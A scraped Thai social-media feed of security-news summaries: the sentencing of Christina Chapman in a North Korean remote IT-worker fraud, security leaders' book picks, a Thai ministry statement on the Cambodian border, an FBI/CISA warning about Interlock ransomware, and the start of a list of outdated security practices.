    นี่คือสิ่งที่เกิดขึ้นจริงในคดีของ Christina Marie Chapman หญิงวัย 50 ปีจากรัฐแอริโซนา ที่ถูกตัดสินจำคุก 8.5 ปีในเดือนกรกฎาคม 2025 จากการช่วยเหลือเจ้าหน้าที่ไอทีของเกาหลีเหนือให้ได้งานในบริษัทสหรัฐฯ กว่า 309 แห่ง รวมถึงบริษัทระดับ Fortune 500 โดยใช้เทคนิคที่เรียกว่า “ฟาร์มแล็ปท็อป” เพื่อหลอกให้บริษัทเชื่อว่าพนักงานเหล่านั้นทำงานจากในประเทศ

    Christina Chapman ถูกตัดสินจำคุก 102 เดือน ฐานช่วยเหลือขบวนการหลอกลวงงานไอทีให้เกาหลีเหนือ
    รับโทษจำคุก 8.5 ปี พร้อมถูกควบคุมหลังพ้นโทษอีก 3 ปี
    ต้องยึดทรัพย์ $284,555.92 และจ่ายค่าปรับ $176,850

    ขบวนการนี้สร้างรายได้ให้เกาหลีเหนือกว่า $17.1 ล้าน
    ใช้ตัวตนปลอมของชาวอเมริกัน 68 คน
    ส่งข้อมูลเท็จไปยังหน่วยงานรัฐกว่า 100 ครั้ง

    Chapman ดำเนินการ “ฟาร์มแล็ปท็อป” ที่บ้านของเธอ
    รับเครื่องจากบริษัทสหรัฐฯ แล้วให้เจ้าหน้าที่เกาหลีเหนือเข้าระบบจากต่างประเทศ
    ส่งแล็ปท็อป 49 เครื่องไปยังเมืองชายแดนจีน-เกาหลีเหนือ

    บริษัทที่ถูกหลอกรวมถึงเครือข่ายโทรทัศน์รายใหญ่, บริษัทเทคโนโลยีใน Silicon Valley, ผู้ผลิตรถยนต์และอากาศยาน
    มีความพยายามเข้าถึงหน่วยงานรัฐบาลสหรัฐฯ 2 แห่ง แต่ถูกสกัดไว้ได้
    บางบริษัทถูกขบวนการนี้ “เลือกเป้าหมาย” โดยเฉพาะ

    รายได้จากงานไอทีถูกส่งกลับไปยังเกาหลีเหนือผ่านการฟอกเงิน
    Chapman รับเงินเดือนแทน, ปลอมลายเซ็น, ฝากเช็ค และโอนเงินไปต่างประเทศ
    รายได้ถูกแจ้งเท็จต่อ IRS และ Social Security

    FBI และ IRS เป็นผู้สืบสวนหลักในคดีนี้
    ยึดแล็ปท็อปกว่า 90 เครื่องจากบ้านของ Chapman
    ถือเป็นหนึ่งในคดีใหญ่ที่สุดที่เกี่ยวข้องกับการหลอกลวงงานไอทีของเกาหลีเหนือ

    รัฐบาลสหรัฐฯ ออกคำแนะนำใหม่สำหรับบริษัทในการตรวจสอบพนักงานระยะไกล
    ตรวจสอบเอกสารตัวตน, ประวัติการศึกษาและการทำงาน
    ใช้วิดีโอสัมภาษณ์แบบเปิดกล้องและตรวจสอบภาพพื้นหลัง

    บริษัทที่ไม่ตรวจสอบพนักงานระยะไกลอย่างเข้มงวดเสี่ยงต่อการถูกแทรกซึม
    อาจถูกขโมยข้อมูล, ติดมัลแวร์ หรือถูกใช้เป็นช่องทางฟอกเงิน
    การใช้บริษัทจัดหางานภายนอกเพิ่มความเสี่ยง

    การใช้ตัวตนปลอมสร้างภาระให้กับพลเมืองสหรัฐฯ ที่ถูกขโมยข้อมูล
    เกิดภาระภาษีเท็จและข้อมูลผิดพลาดในระบบราชการ
    สร้างความเสียหายทางจิตใจและการเงินแก่ผู้ถูกแอบอ้าง

    รายได้จากงานไอทีถูกนำไปใช้สนับสนุนโครงการอาวุธของเกาหลีเหนือ
    เป็นการละเมิดมาตรการคว่ำบาตรของสหรัฐฯ และสหประชาชาติ
    ส่งผลต่อความมั่นคงระดับโลก

    การใช้ AI และเทคโนโลยีใหม่เพิ่มความซับซ้อนในการปลอมตัว
    มีการใช้ AI เปลี่ยนภาพเอกสาร, ปรับเสียง และสร้างวิดีโอปลอม
    ทำให้การตรวจสอบตัวตนยากขึ้นสำหรับบริษัททั่วไป

    https://hackread.com/arizona-woman-jailed-help-north-korea-it-job-scam/
    🧑‍💻 เรื่องเล่าจากโลกไซเบอร์: เมื่อ “งานไอที” กลายเป็นช่องทางส่งเงินให้โครงการนิวเคลียร์เกาหลีเหนือ ลองจินตนาการว่าคุณเป็นบริษัทเทคโนโลยีในสหรัฐฯ ที่จ้างพนักงานไอทีทำงานจากระยะไกล โดยเชื่อว่าเขาเป็นพลเมืองอเมริกัน แต่จริงๆ แล้ว เขาคือเจ้าหน้าที่จากเกาหลีเหนือที่ใช้ตัวตนปลอม และเงินเดือนที่คุณจ่ายไปนั้นถูกส่งตรงไปยังรัฐบาลเปียงยางเพื่อใช้ในโครงการอาวุธนิวเคลียร์! นี่คือสิ่งที่เกิดขึ้นจริงในคดีของ Christina Marie Chapman หญิงวัย 50 ปีจากรัฐแอริโซนา ที่ถูกตัดสินจำคุก 8.5 ปีในเดือนกรกฎาคม 2025 จากการช่วยเหลือเจ้าหน้าที่ไอทีของเกาหลีเหนือให้ได้งานในบริษัทสหรัฐฯ กว่า 309 แห่ง รวมถึงบริษัทระดับ Fortune 500 โดยใช้เทคนิคที่เรียกว่า “ฟาร์มแล็ปท็อป” เพื่อหลอกให้บริษัทเชื่อว่าพนักงานเหล่านั้นทำงานจากในประเทศ ✅ Christina Chapman ถูกตัดสินจำคุก 102 เดือน ฐานช่วยเหลือขบวนการหลอกลวงงานไอทีให้เกาหลีเหนือ ➡️ รับโทษจำคุก 8.5 ปี พร้อมถูกควบคุมหลังพ้นโทษอีก 3 ปี ➡️ ต้องยึดทรัพย์ $284,555.92 และจ่ายค่าปรับ $176,850 ✅ ขบวนการนี้สร้างรายได้ให้เกาหลีเหนือกว่า $17.1 ล้าน ➡️ ใช้ตัวตนปลอมของชาวอเมริกัน 68 คน ➡️ ส่งข้อมูลเท็จไปยังหน่วยงานรัฐกว่า 100 ครั้ง ✅ Chapman ดำเนินการ “ฟาร์มแล็ปท็อป” ที่บ้านของเธอ ➡️ รับเครื่องจากบริษัทสหรัฐฯ แล้วให้เจ้าหน้าที่เกาหลีเหนือเข้าระบบจากต่างประเทศ ➡️ ส่งแล็ปท็อป 49 เครื่องไปยังเมืองชายแดนจีน-เกาหลีเหนือ ✅ บริษัทที่ถูกหลอกรวมถึงเครือข่ายโทรทัศน์รายใหญ่, บริษัทเทคโนโลยีใน Silicon Valley, ผู้ผลิตรถยนต์และอากาศยาน ➡️ มีความพยายามเข้าถึงหน่วยงานรัฐบาลสหรัฐฯ 2 แห่ง แต่ถูกสกัดไว้ได้ ➡️ บางบริษัทถูกขบวนการนี้ “เลือกเป้าหมาย” โดยเฉพาะ ✅ รายได้จากงานไอทีถูกส่งกลับไปยังเกาหลีเหนือผ่านการฟอกเงิน ➡️ Chapman รับเงินเดือนแทน, ปลอมลายเซ็น, ฝากเช็ค และโอนเงินไปต่างประเทศ ➡️ รายได้ถูกแจ้งเท็จต่อ IRS และ Social Security ✅ FBI และ IRS เป็นผู้สืบสวนหลักในคดีนี้ ➡️ ยึดแล็ปท็อปกว่า 90 เครื่องจากบ้านของ Chapman ➡️ ถือเป็นหนึ่งในคดีใหญ่ที่สุดที่เกี่ยวข้องกับการหลอกลวงงานไอทีของเกาหลีเหนือ ✅ รัฐบาลสหรัฐฯ ออกคำแนะนำใหม่สำหรับบริษัทในการตรวจสอบพนักงานระยะไกล ➡️ ตรวจสอบเอกสารตัวตน, ประวัติการศึกษาและการทำงาน ➡️ ใช้วิดีโอสัมภาษณ์แบบเปิดกล้องและตรวจสอบภาพพื้นหลัง ‼️ บริษัทที่ไม่ตรวจสอบพนักงานระยะไกลอย่างเข้มงวดเสี่ยงต่อการถูกแทรกซึม ⛔ อาจถูกขโมยข้อมูล, ติดมัลแวร์ หรือถูกใช้เป็นช่องทางฟอกเงิน ⛔ การใช้บริษัทจัดหางานภายนอกเพิ่มความเสี่ยง ‼️ การใช้ตัวตนปลอมสร้างภาระให้กับพลเมืองสหรัฐฯ ที่ถูกขโมยข้อมูล ⛔ เกิดภาระภาษีเท็จและข้อมูลผิดพลาดในระบบราชการ ⛔ สร้างความเสียหายทางจิตใจและการเงินแก่ผู้ถูกแอบอ้าง ‼️ รายได้จากงานไอทีถูกนำไปใช้สนับสนุนโครงการอาวุธของเกาหลีเหนือ ⛔ เป็นการละเมิดมาตรการคว่ำบาตรของสหรัฐฯ และสหประชาชาติ ⛔ ส่งผลต่อความมั่นคงระดับโลก ‼️ การใช้ AI และเทคโนโลยีใหม่เพิ่มความซับซ้อนในการปลอมตัว ⛔ มีการใช้ AI เปลี่ยนภาพเอกสาร, ปรับเสียง และสร้างวิดีโอปลอม ⛔ ทำให้การตรวจสอบตัวตนยากขึ้นสำหรับบริษัททั่วไป https://hackread.com/arizona-woman-jailed-help-north-korea-it-job-scam/
    HACKREAD.COM
    Arizona Woman Jailed for Helping North Korea in $17M IT Job Scam
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 132 มุมมอง 0 รีวิว
  • เรื่องเล่าจากโลกไซเบอร์: หนังสือที่เปลี่ยนผู้นำให้กลายเป็นนักคิดเชิงกลยุทธ์

    ลองนึกภาพว่าคุณเป็น CISO (Chief Information Security Officer) ที่ต้องรับมือกับภัยคุกคามไซเบอร์ตลอดเวลา ทั้งการโจมตีแบบใหม่ ความเสี่ยงจากพฤติกรรมมนุษย์ และแรงกดดันจากผู้บริหารระดับสูง คุณจะพึ่งพาอะไรเพื่อพัฒนาทักษะการตัดสินใจและความเป็นผู้นำ?

    คำตอบของผู้นำหลายคนคือ “หนังสือ” — ไม่ใช่แค่คู่มือเทคนิค แต่เป็นแหล่งความรู้ที่ช่วยให้พวกเขาเข้าใจความเสี่ยง มนุษย์ และตัวเองได้ลึกซึ้งขึ้น

    จากการสำรวจของ CSO Online พบว่า CISO ชั้นนำแนะนำหนังสือหลากหลายแนว ตั้งแต่จิตวิทยาการตัดสินใจอย่าง Thinking, Fast and Slow ไปจนถึงการวัดความเสี่ยงแบบใหม่ใน How to Measure Anything in Cybersecurity Risk และแม้แต่หนังสืออย่าง The Art of Deception ที่เผยกลยุทธ์ของแฮกเกอร์ในการหลอกล่อมนุษย์

    สิ่งที่น่าสนใจคือ หลายคนยังแนะนำหนังสือที่ไม่เกี่ยวกับไซเบอร์โดยตรง เช่น The Alchemist หรือ Our Town เพื่อเตือนตัวเองให้กลับมาโฟกัสกับชีวิตและความหมายที่แท้จริง

    หนังสือที่ช่วยพัฒนาทักษะการวัดและจัดการความเสี่ยง

    How to Measure Anything in Cybersecurity Risk โดย Douglas Hubbard & Richard Seiersen
    เสนอวิธีวัดความเสี่ยงแบบกึ่งปริมาณที่แม่นยำกว่าการใช้ risk matrix
    ได้รับการแนะนำจากหลาย CISO เช่น Daniel Schatz และ James Blake

    Superforecasting โดย Philip Tetlock & Dan Gardner
    เจาะลึกศาสตร์แห่งการพยากรณ์อนาคตอย่างมีหลักการ
    มีตัวอย่างจริงและแนวทางสร้างการคาดการณ์ที่แม่นยำ

    หนังสือที่ช่วยลด “เสียงรบกวน” ในการตัดสินใจ

    Thinking, Fast and Slow โดย Daniel Kahneman
    อธิบายระบบคิดแบบเร็ว (System 1) และช้า (System 2)
    ช่วยให้เข้าใจอคติและข้อผิดพลาดในการตัดสินใจ

    Noise โดย Kahneman และทีม
    วิเคราะห์ว่าทำไมมนุษย์ถึงตัดสินใจผิดเพราะ “เสียงรบกวน”
    เสนอวิธีลดความผิดพลาดในการประเมินสถานการณ์

    Yeah, But โดย Marc Wolfe
    ช่วยให้ผู้นำจัดการกับเสียงในหัวที่ขัดขวางการเปลี่ยนแปลง
    ส่งเสริมความชัดเจนในการคิดและการนำทีม

    Digital Minimalism โดย Cal Newport
    ส่งเสริมการใช้เทคโนโลยีอย่างมีสติ
    ช่วยปกป้องเวลาและความสนใจของผู้นำ

    Better Than Before โดย Gretchen Rubin
    เสนอกรอบการสร้างนิสัยที่ดีเพื่อสนับสนุนเป้าหมายชีวิตและงาน

    หนังสือที่เน้นความเสี่ยงจากพฤติกรรมมนุษย์

    The Art of Deception โดย Kevin Mitnick
    เผยกลยุทธ์ social engineering ที่แฮกเกอร์ใช้หลอกมนุษย์
    ยังคงเป็นหนังสือพื้นฐานที่มีคุณค่าแม้จะตีพิมพ์มานาน

    Secrets and Lies โดย Bruce Schneier
    อธิบายความซับซ้อนของความปลอดภัยดิจิทัล
    เน้นว่าการจัดการพฤติกรรมมนุษย์สำคัญไม่แพ้เทคโนโลยี

    Human Hacked โดย Len Noe
    เจาะลึกผลกระทบของ AI ต่อการตัดสินใจของมนุษย์
    เตือนถึงผลลัพธ์ที่ไม่คาดคิดจากการผสานมนุษย์กับเทคโนโลยี

    ความเสี่ยงจากการละเลยพฤติกรรมมนุษย์ในระบบความปลอดภัย
    องค์กรที่เน้นเทคโนโลยีอย่างเดียวอาจพลาดช่องโหว่จากมนุษย์
    การไม่เข้าใจ social engineering ทำให้ระบบถูกเจาะง่ายขึ้น

    หนังสือที่ช่วยพัฒนาภาวะผู้นำ

    Dare to Lead โดย Brené Brown
    เน้นความกล้าหาญทางอารมณ์และความยืดหยุ่น
    ส่งเสริมวัฒนธรรมองค์กรที่เปิดกว้างและรับผิดชอบ

    Radical Candor โดย Kim Scott
    เสนอกรอบการให้ feedback ที่ตรงไปตรงมาแต่มีความเห็นอกเห็นใจ
    ช่วยสร้างวัฒนธรรมการสื่อสารที่มีประสิทธิภาพ

    ความเสี่ยงจากการเป็นผู้นำที่ขาดความเห็นอกเห็นใจ
    ผู้นำที่เน้นเทคนิคแต่ละเลยมนุษย์อาจสร้างทีมที่ไม่ยั่งยืน
    การขาด feedback ที่มีคุณภาพทำให้ทีมขาดการพัฒนา

    หนังสือที่เตือนให้กลับมาโฟกัสกับชีวิต

    Our Town โดย Thornton Wilder
    เตือนให้เห็นคุณค่าของชีวิตประจำวันและความสัมพันธ์
    ช่วยให้ผู้นำกลับมาโฟกัสกับสิ่งสำคัญนอกเหนือจากงาน

    The Alchemist โดย Paulo Coelho
    เรื่องราวการเดินทางตามความฝันที่เต็มไปด้วยบทเรียนชีวิต
    สะท้อนความกล้าหาญในการเลือกเส้นทางที่ไม่เป็นไปตามกรอบเดิม

    Get Out of I.T. While You Can โดย Craig Schiefelbein
    ท้าทายให้ผู้นำไอทีทบทวนบทบาทและคุณค่าของตน
    กระตุ้นให้สร้างผลกระทบเชิงกลยุทธ์มากกว่าการทำงานเชิงเทคนิค

    https://www.csoonline.com/article/4027000/the-books-shaping-todays-cybersecurity-leaders.html
    📚 เรื่องเล่าจากโลกไซเบอร์: หนังสือที่เปลี่ยนผู้นำให้กลายเป็นนักคิดเชิงกลยุทธ์ ลองนึกภาพว่าคุณเป็น CISO (Chief Information Security Officer) ที่ต้องรับมือกับภัยคุกคามไซเบอร์ตลอดเวลา ทั้งการโจมตีแบบใหม่ ความเสี่ยงจากพฤติกรรมมนุษย์ และแรงกดดันจากผู้บริหารระดับสูง คุณจะพึ่งพาอะไรเพื่อพัฒนาทักษะการตัดสินใจและความเป็นผู้นำ? คำตอบของผู้นำหลายคนคือ “หนังสือ” — ไม่ใช่แค่คู่มือเทคนิค แต่เป็นแหล่งความรู้ที่ช่วยให้พวกเขาเข้าใจความเสี่ยง มนุษย์ และตัวเองได้ลึกซึ้งขึ้น จากการสำรวจของ CSO Online พบว่า CISO ชั้นนำแนะนำหนังสือหลากหลายแนว ตั้งแต่จิตวิทยาการตัดสินใจอย่าง Thinking, Fast and Slow ไปจนถึงการวัดความเสี่ยงแบบใหม่ใน How to Measure Anything in Cybersecurity Risk และแม้แต่หนังสืออย่าง The Art of Deception ที่เผยกลยุทธ์ของแฮกเกอร์ในการหลอกล่อมนุษย์ สิ่งที่น่าสนใจคือ หลายคนยังแนะนำหนังสือที่ไม่เกี่ยวกับไซเบอร์โดยตรง เช่น The Alchemist หรือ Our Town เพื่อเตือนตัวเองให้กลับมาโฟกัสกับชีวิตและความหมายที่แท้จริง 📙📖 หนังสือที่ช่วยพัฒนาทักษะการวัดและจัดการความเสี่ยง ⭕ ✅ How to Measure Anything in Cybersecurity Risk โดย Douglas Hubbard & Richard Seiersen ➡️ เสนอวิธีวัดความเสี่ยงแบบกึ่งปริมาณที่แม่นยำกว่าการใช้ risk matrix ➡️ ได้รับการแนะนำจากหลาย CISO เช่น Daniel Schatz และ James Blake ✅ Superforecasting โดย Philip Tetlock & Dan Gardner ➡️ เจาะลึกศาสตร์แห่งการพยากรณ์อนาคตอย่างมีหลักการ ➡️ มีตัวอย่างจริงและแนวทางสร้างการคาดการณ์ที่แม่นยำ ⭐📖 หนังสือที่ช่วยลด “เสียงรบกวน” ในการตัดสินใจ ⭕ ✅ Thinking, Fast and Slow โดย Daniel Kahneman ➡️ อธิบายระบบคิดแบบเร็ว (System 1) และช้า (System 2) ➡️ ช่วยให้เข้าใจอคติและข้อผิดพลาดในการตัดสินใจ ✅ Noise โดย Kahneman และทีม ➡️ วิเคราะห์ว่าทำไมมนุษย์ถึงตัดสินใจผิดเพราะ “เสียงรบกวน” ➡️ เสนอวิธีลดความผิดพลาดในการประเมินสถานการณ์ ✅ Yeah, But โดย Marc Wolfe ➡️ ช่วยให้ผู้นำจัดการกับเสียงในหัวที่ขัดขวางการเปลี่ยนแปลง ➡️ ส่งเสริมความชัดเจนในการคิดและการนำทีม ✅ Digital Minimalism โดย Cal Newport ➡️ ส่งเสริมการใช้เทคโนโลยีอย่างมีสติ ➡️ ช่วยปกป้องเวลาและความสนใจของผู้นำ ✅ Better Than Before โดย Gretchen Rubin ➡️ เสนอกรอบการสร้างนิสัยที่ดีเพื่อสนับสนุนเป้าหมายชีวิตและงาน 🙎‍♂️📖 หนังสือที่เน้นความเสี่ยงจากพฤติกรรมมนุษย์ ⭕ ✅ The Art of Deception โดย Kevin Mitnick ➡️ เผยกลยุทธ์ social engineering ที่แฮกเกอร์ใช้หลอกมนุษย์ ➡️ ยังคงเป็นหนังสือพื้นฐานที่มีคุณค่าแม้จะตีพิมพ์มานาน ✅ Secrets and Lies โดย Bruce Schneier ➡️ อธิบายความซับซ้อนของความปลอดภัยดิจิทัล ➡️ เน้นว่าการจัดการพฤติกรรมมนุษย์สำคัญไม่แพ้เทคโนโลยี ✅ Human Hacked โดย Len Noe ➡️ เจาะลึกผลกระทบของ AI ต่อการตัดสินใจของมนุษย์ ➡️ เตือนถึงผลลัพธ์ที่ไม่คาดคิดจากการผสานมนุษย์กับเทคโนโลยี ‼️ ความเสี่ยงจากการละเลยพฤติกรรมมนุษย์ในระบบความปลอดภัย ⛔ องค์กรที่เน้นเทคโนโลยีอย่างเดียวอาจพลาดช่องโหว่จากมนุษย์ ⛔ การไม่เข้าใจ social engineering ทำให้ระบบถูกเจาะง่ายขึ้น 🔝📖 หนังสือที่ช่วยพัฒนาภาวะผู้นำ ⭕ ✅ Dare to Lead โดย Brené Brown ➡️ เน้นความกล้าหาญทางอารมณ์และความยืดหยุ่น ➡️ ส่งเสริมวัฒนธรรมองค์กรที่เปิดกว้างและรับผิดชอบ ✅ Radical Candor โดย Kim Scott ➡️ เสนอกรอบการให้ feedback ที่ตรงไปตรงมาแต่มีความเห็นอกเห็นใจ ➡️ ช่วยสร้างวัฒนธรรมการสื่อสารที่มีประสิทธิภาพ ‼️ ความเสี่ยงจากการเป็นผู้นำที่ขาดความเห็นอกเห็นใจ ⛔ ผู้นำที่เน้นเทคนิคแต่ละเลยมนุษย์อาจสร้างทีมที่ไม่ยั่งยืน ⛔ การขาด feedback ที่มีคุณภาพทำให้ทีมขาดการพัฒนา 🔎📖 หนังสือที่เตือนให้กลับมาโฟกัสกับชีวิต ⭕ ✅ Our Town โดย Thornton Wilder ➡️ เตือนให้เห็นคุณค่าของชีวิตประจำวันและความสัมพันธ์ ➡️ ช่วยให้ผู้นำกลับมาโฟกัสกับสิ่งสำคัญนอกเหนือจากงาน ✅ The Alchemist โดย Paulo Coelho ➡️ เรื่องราวการเดินทางตามความฝันที่เต็มไปด้วยบทเรียนชีวิต ➡️ สะท้อนความกล้าหาญในการเลือกเส้นทางที่ไม่เป็นไปตามกรอบเดิม ✅ Get Out of I.T. While You Can โดย Craig Schiefelbein ➡️ ท้าทายให้ผู้นำไอทีทบทวนบทบาทและคุณค่าของตน ➡️ กระตุ้นให้สร้างผลกระทบเชิงกลยุทธ์มากกว่าการทำงานเชิงเทคนิค https://www.csoonline.com/article/4027000/the-books-shaping-todays-cybersecurity-leaders.html
    WWW.CSOONLINE.COM
    The books shaping today’s cybersecurity leaders
    Cybersecurity leaders reveal the books that have influenced how they lead, think, and manage security in the enterprise — and their own lives.
    0 ความคิดเห็น 0 การแบ่งปัน 203 มุมมอง 0 รีวิว
  • กระทรวงการพัฒนาสังคมและความมั่นคงของมนุษย์ แถลงการณ์ประณามการโจมตีพลเรือนตามแนวชายแดนไทย-กัมพูชา ละเมิดกฎหมายมนุษยธรรมระหว่างประเทศร้ายแรง ส่งผลกระทบกลุ่มเปราะบาง-สวัสดิภาพทางสังคม-ความมั่นคงของมนุษย์

    MSDHS issued an official statement, Condemning the Attacks on Civilians along the Thai-Cambodian Border: Serious Violations of International Humanitarian Law with Adverse Impacts on Vulnerable People, Social Welfare, and Human Security.
    #cambodiaopenedFlre
    กระทรวงการพัฒนาสังคมและความมั่นคงของมนุษย์ แถลงการณ์ประณามการโจมตีพลเรือนตามแนวชายแดนไทย-กัมพูชา ละเมิดกฎหมายมนุษยธรรมระหว่างประเทศร้ายแรง ส่งผลกระทบกลุ่มเปราะบาง-สวัสดิภาพทางสังคม-ความมั่นคงของมนุษย์ MSDHS issued an official statement, Condemning the Attacks on Civilians along the Thai-Cambodian Border: Serious Violations of International Humanitarian Law with Adverse Impacts on Vulnerable People, Social Welfare, and Human Security. #cambodiaopenedFlre
    0 ความคิดเห็น 0 การแบ่งปัน 217 มุมมอง 0 0 รีวิว
  • เรื่องเล่าจากมัลแวร์ที่ปลอมตัวเป็น Chrome: เมื่อ Interlock แรนซัมแวร์ใช้ CAPTCHA หลอกให้รันคำสั่งเอง

    Interlock ถูกตรวจพบครั้งแรกในเดือนกันยายน 2024 และมีการโจมตีเพิ่มขึ้นในช่วงกลางปี 2025 โดย FBI พบว่า:
    - กลุ่มนี้พัฒนาแรนซัมแวร์สำหรับทั้ง Windows และ Linux
    - เน้นโจมตีระบบ virtual machine (VM) และใช้เทคนิคใหม่ในการเข้าถึงระบบ

    เทคนิคที่ใช้มีความแปลกใหม่ เช่น:
    - “Drive-by download” จากเว็บไซต์ที่ถูกแฮก โดยปลอมเป็นอัปเดตของ Chrome, Edge, FortiClient หรือ Cisco Secure Client
    - “ClickFix” — หลอกให้ผู้ใช้คลิก CAPTCHA ปลอม แล้วคัดลอกคำสั่งไปวางในหน้าต่าง Run ของระบบ

    เมื่อเข้าระบบได้แล้ว Interlock จะ:
    - ใช้ web shell และ Cobalt Strike เพื่อควบคุมระบบ
    - ขโมยข้อมูล เช่น username, password และใช้ keylogger บันทึกการพิมพ์
    - เข้ารหัสไฟล์และเปลี่ยนนามสกุลเป็น .interlock หรือ .1nt3rlock
    - ส่งโน้ตร้องขอค่าไถ่ผ่านเว็บไซต์ .onion โดยไม่ระบุจำนวนเงิน
    - ข่มขู่ว่าจะเปิดเผยข้อมูลหากไม่จ่ายค่าไถ่เป็น Bitcoin — และเคยทำจริงหลายครั้ง

    FBI, CISA, HHS และ MS-ISAC แนะนำให้ทุกองค์กรเร่งดำเนินมาตรการป้องกัน เช่น:
    - ใช้ DNS filtering และ firewall เพื่อป้องกันการเข้าถึงเว็บอันตราย
    - อัปเดตระบบและซอฟต์แวร์ทั้งหมด
    - ใช้ MFA และจัดการสิทธิ์การเข้าถึงอย่างเข้มงวด
    - แบ่งเครือข่ายเพื่อลดการแพร่กระจาย
    - สำรองข้อมูลแบบ offline และไม่สามารถแก้ไขได้ (immutable backup)

    FBI และ CISA เตือนภัย Interlock ransomware ที่โจมตีองค์กรและโครงสร้างพื้นฐานสำคัญ
    ใช้เทคนิค double extortion คือทั้งเข้ารหัสและข่มขู่เปิดเผยข้อมูล

    Interlock พัฒนาแรนซัมแวร์สำหรับ Windows และ Linux โดยเน้นโจมตี VM
    ใช้เทคนิคใหม่ เช่น drive-by download และ ClickFix

    ClickFix คือการหลอกให้ผู้ใช้คลิก CAPTCHA ปลอม แล้วรันคำสั่งอันตรายเอง
    เป็นการใช้ social engineering ที่แยบยลและยากต่อการตรวจจับ

    หลังเข้าระบบ Interlock ใช้ Cobalt Strike และ web shell เพื่อควบคุมและขโมยข้อมูล
    รวมถึงการใช้ keylogger เพื่อดักจับการพิมพ์

    ไฟล์ที่ถูกเข้ารหัสจะมีนามสกุล .interlock หรือ .1nt3rlock
    โน้ตร้องขอค่าไถ่ไม่ระบุจำนวนเงิน แต่ให้ติดต่อผ่าน Tor

    หน่วยงานแนะนำให้ใช้ DNS filtering, MFA, network segmentation และ backup แบบ immutable
    พร้อมทรัพยากรฟรีจากโครงการ #StopRansomware

    https://hackread.com/fbi-cisa-interlock-ransomware-target-critical-infrastructure/
    🎙️ เรื่องเล่าจากมัลแวร์ที่ปลอมตัวเป็น Chrome: เมื่อ Interlock แรนซัมแวร์ใช้ CAPTCHA หลอกให้รันคำสั่งเอง Interlock ถูกตรวจพบครั้งแรกในเดือนกันยายน 2024 และมีการโจมตีเพิ่มขึ้นในช่วงกลางปี 2025 โดย FBI พบว่า: - กลุ่มนี้พัฒนาแรนซัมแวร์สำหรับทั้ง Windows และ Linux - เน้นโจมตีระบบ virtual machine (VM) และใช้เทคนิคใหม่ในการเข้าถึงระบบ เทคนิคที่ใช้มีความแปลกใหม่ เช่น: - “Drive-by download” จากเว็บไซต์ที่ถูกแฮก โดยปลอมเป็นอัปเดตของ Chrome, Edge, FortiClient หรือ Cisco Secure Client - “ClickFix” — หลอกให้ผู้ใช้คลิก CAPTCHA ปลอม แล้วคัดลอกคำสั่งไปวางในหน้าต่าง Run ของระบบ เมื่อเข้าระบบได้แล้ว Interlock จะ: - ใช้ web shell และ Cobalt Strike เพื่อควบคุมระบบ - ขโมยข้อมูล เช่น username, password และใช้ keylogger บันทึกการพิมพ์ - เข้ารหัสไฟล์และเปลี่ยนนามสกุลเป็น .interlock หรือ .1nt3rlock - ส่งโน้ตร้องขอค่าไถ่ผ่านเว็บไซต์ .onion โดยไม่ระบุจำนวนเงิน - ข่มขู่ว่าจะเปิดเผยข้อมูลหากไม่จ่ายค่าไถ่เป็น Bitcoin — และเคยทำจริงหลายครั้ง FBI, CISA, HHS และ MS-ISAC แนะนำให้ทุกองค์กรเร่งดำเนินมาตรการป้องกัน เช่น: - ใช้ DNS filtering และ firewall เพื่อป้องกันการเข้าถึงเว็บอันตราย - อัปเดตระบบและซอฟต์แวร์ทั้งหมด - ใช้ MFA และจัดการสิทธิ์การเข้าถึงอย่างเข้มงวด - แบ่งเครือข่ายเพื่อลดการแพร่กระจาย - สำรองข้อมูลแบบ offline และไม่สามารถแก้ไขได้ (immutable backup) ✅ FBI และ CISA เตือนภัย Interlock ransomware ที่โจมตีองค์กรและโครงสร้างพื้นฐานสำคัญ ➡️ ใช้เทคนิค double extortion คือทั้งเข้ารหัสและข่มขู่เปิดเผยข้อมูล ✅ Interlock พัฒนาแรนซัมแวร์สำหรับ Windows และ Linux โดยเน้นโจมตี VM ➡️ ใช้เทคนิคใหม่ เช่น drive-by download และ ClickFix ✅ ClickFix คือการหลอกให้ผู้ใช้คลิก CAPTCHA ปลอม แล้วรันคำสั่งอันตรายเอง ➡️ เป็นการใช้ social engineering ที่แยบยลและยากต่อการตรวจจับ ✅ หลังเข้าระบบ Interlock ใช้ Cobalt Strike และ web shell เพื่อควบคุมและขโมยข้อมูล ➡️ รวมถึงการใช้ keylogger เพื่อดักจับการพิมพ์ ✅ ไฟล์ที่ถูกเข้ารหัสจะมีนามสกุล .interlock หรือ .1nt3rlock ➡️ โน้ตร้องขอค่าไถ่ไม่ระบุจำนวนเงิน แต่ให้ติดต่อผ่าน Tor ✅ หน่วยงานแนะนำให้ใช้ DNS filtering, MFA, network segmentation และ backup แบบ immutable ➡️ พร้อมทรัพยากรฟรีจากโครงการ #StopRansomware https://hackread.com/fbi-cisa-interlock-ransomware-target-critical-infrastructure/
    HACKREAD.COM
    FBI and CISA Warn of Interlock Ransomware Targeting Critical Infrastructure
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 207 มุมมอง 0 รีวิว
  • เรื่องเล่าจากโลกไซเบอร์: 7 แนวทางความปลอดภัยที่ควรเลิกใช้ ก่อนที่มันจะทำร้ายองค์กร

    ในยุคที่ภัยไซเบอร์ซับซ้อนและเปลี่ยนแปลงเร็ว การยึดติดกับแนวทางเก่า ๆ อาจกลายเป็นจุดอ่อนร้ายแรงขององค์กร บทความจาก CSO Online ได้รวบรวม 7 แนวทางด้านความปลอดภัยที่ล้าสมัยและควรเลิกใช้ทันที พร้อมคำแนะนำจากผู้เชี่ยวชาญในวงการ

    1️⃣ การพึ่ง perimeter-only security
    ไม่เพียงพอในยุค cloud และ hybrid work ต้องใช้แนวคิด Zero Trust

    2️⃣ การเน้น compliance มากกว่าความปลอดภัยจริง
    การตรวจสอบตามข้อกำหนดไม่ช่วยป้องกันภัยคุกคามที่แท้จริง
    ทีมงานอาจมัวแต่ตอบ audit แทนที่จะป้องกันภัยจริง

    3️⃣ การใช้ VPN แบบเก่า (legacy VPNs)
    ไม่สามารถรองรับการทำงานแบบ remote และขาดการอัปเดตที่ปลอดภัย
    เสี่ยงต่อการโจมตีและการเข้าถึงโดยไม่ได้รับอนุญาต

    4️⃣ การคิดว่า EDR เพียงพอแล้ว
    ผู้โจมตีสามารถหลบเลี่ยง EDR โดยโจมตีผ่าน cloud, network หรือ API
